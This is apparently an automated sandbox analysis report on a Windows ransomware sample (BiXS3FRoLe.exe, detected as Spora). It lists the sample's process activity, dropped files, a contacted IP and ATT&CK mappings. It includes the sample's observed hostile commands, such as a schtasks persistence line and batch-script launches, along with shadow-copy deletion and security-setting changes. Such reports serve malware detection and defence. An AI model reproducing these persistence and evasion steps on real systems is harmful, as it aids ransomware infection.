      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
      Source: Xinfecter.exe, 00000030.00000002.1395053715.00000000008AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01105 cpuid 0_2_00B01105
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: ___crtGetLocaleInfoEx,0_2_00AFC03B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00AFC347
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00B3E50A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B3E782
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B3E7CD
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3E8F5
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B3E868
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00B3EB45
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B32C30
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B3EC6E
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00B3ED75
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3EE42
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00B3311A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: ___crtGetLocaleInfoEx,48_2_0009C03B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_0009C347
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,48_2_000DE50A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000DE782
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000DE7CD
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000DE868
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,48_2_000DE8F5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_000DEB45
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000D2C30
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,48_2_000DEC6E
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_000DED75
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,48_2_000DEE42
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_000D311A
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01BDB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B01BDB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A836F0 GetUserNameW,0_2_00A836F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B3B462 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00B3B462
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B06793 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_00B06793
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Changes security center settings (notifications, updates, antivirus, firewall)
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
      Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
      Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A71960 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71960
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A71020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71020
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A712E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A712E0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B12073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00B12073
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B12D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00B12D69
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B2073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,48_2_000B2073
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B2D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,48_2_000B2D69

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting      		1
      Replication Through Removable Media      		241
      Windows Management Instrumentation      		12
      Scripting      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		2
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Windows Service      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory11
      Peripheral Device Discovery      		Remote Desktop ProtocolData from Removable Media2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Scheduled Task/Job      		11
      Windows Service      		12
      Process Injection      		2
      Obfuscated Files or Information      		Security Account Manager1
      Account Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Service Execution      		1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		1
      DLL Side-Loading      		NTDS3
      File and Directory Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchd12
      Registry Run Keys / Startup Folder      		12
      Registry Run Keys / Startup Folder      		1
      File Deletion      		LSA Secrets68
      System Information Discovery      		SSHKeylogging2
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
      Masquerading      		Cached Domain Credentials1
      Network Share Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items15
      Virtualization/Sandbox Evasion      		DCSync281
      Security Software Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
      Process Injection      		Proc Filesystem15
      Virtualization/Sandbox Evasion      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Indicator Removal      		/etc/passwd and /etc/shadow3
      Process Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
      System Owner/User Discovery      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
      System Network Configuration Discovery      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569984 Sample: BiXS3FRoLe.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 87 api.ipify.org 2->87 93 Suricata IDS alerts for network traffic 2->93 95 Antivirus detection for dropped file 2->95 97 Antivirus / Scanner detection for submitted sample 2->97 99 12 other signatures 2->99 10 BiXS3FRoLe.exe 22 2->10         started        15 cmd.exe 2->15         started        17 svchost.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 89 185.147.34.53, 3586, 49715 HOSTSLIM-GLOBAL-NETWORKNL Iceland 10->89 91 api.ipify.org 104.26.13.205, 49709, 80 CLOUDFLARENETUS United States 10->91 79 C:\Users\user\AppData\...\Xinfecter.exe, PE32 10->79 dropped 81 C:\Windows\SysMain.sys, ASCII 10->81 dropped 83 C:\Users\user\AppData\S-8459.vbs, ASCII 10->83 dropped 85 4 other malicious files 10->85 dropped 111 Deletes shadow drive data (may be related to ransomware) 10->111 113 Drops PE files to the startup folder 10->113 115 Sample is not signed and drops a device driver 10->115 117 Contains functionality to clear event logs 10->117 21 cmd.exe 1 10->21         started        23 cmd.exe 3 2 10->23         started        25 cmd.exe 1 10->25         started        36 9 other processes 10->36 28 wscript.exe 15->28         started        30 conhost.exe 15->30         started        119 Changes security center settings (notifications, updates, antivirus, firewall) 17->119 32 MpCmdRun.exe 17->32         started        34 conhost.exe 19->34         started        file6 signatures7 process8 signatures9 38 systeminfo.exe 2 1 21->38         started        41 find.exe 1 21->41         started        43 wscript.exe 1 23->43         started        107 Uses schtasks.exe or at.exe to add and modify task schedules 25->107 45 tasklist.exe 1 25->45         started        47 findstr.exe 1 25->47         started        109 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->109 49 cmd.exe 28->49         started        51 cmd.exe 28->51         started        53 conhost.exe 32->53         started        55 6 other processes 36->55 process10 signatures11 101 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 38->101 103 Writes or reads registry keys via WMI 38->103 105 Windows Scripting host queries suspicious COM object (likely to drop second stage) 43->105 57 cmd.exe 1 43->57         started        59 cmd.exe 1 43->59         started        61 conhost.exe 49->61         started        63 tasklist.exe 49->63         started        65 find.exe 49->65         started        67 conhost.exe 51->67         started        process12 process13 69 tasklist.exe 1 57->69         started        71 conhost.exe 57->71         started        73 find.exe 57->73         started        77 12 other processes 57->77 75 conhost.exe 59->75         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      BiXS3FRoLe.exe84%ReversingLabsWin32.Ransomware.Spora
      BiXS3FRoLe.exe100%AviraHEUR/AGEN.1353205
      BiXS3FRoLe.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe100%AviraHEUR/AGEN.1353205
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe84%ReversingLabsWin32.Ransomware.Spora

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ipify.org
      		104.26.13.205
      		truefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.1364296546.000001F12F65E000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000006.00000002.1365100771.000001F12F678000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364027254.000001F12F676000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://api.ipify.org/EBiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.coinbase.com/how-to-buy/bitcoinBiXS3FRoLe.exe, Xinfecter.exe.0.drfalse
                            		high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.kraken.com/learn/buy-bitcoin-btcBiXS3FRoLe.exe, Xinfecter.exe.0.drfalse
                                            		high
                                            https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://api.ipify.orgBiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364082851.000001F12F670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365083917.000001F12F672000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
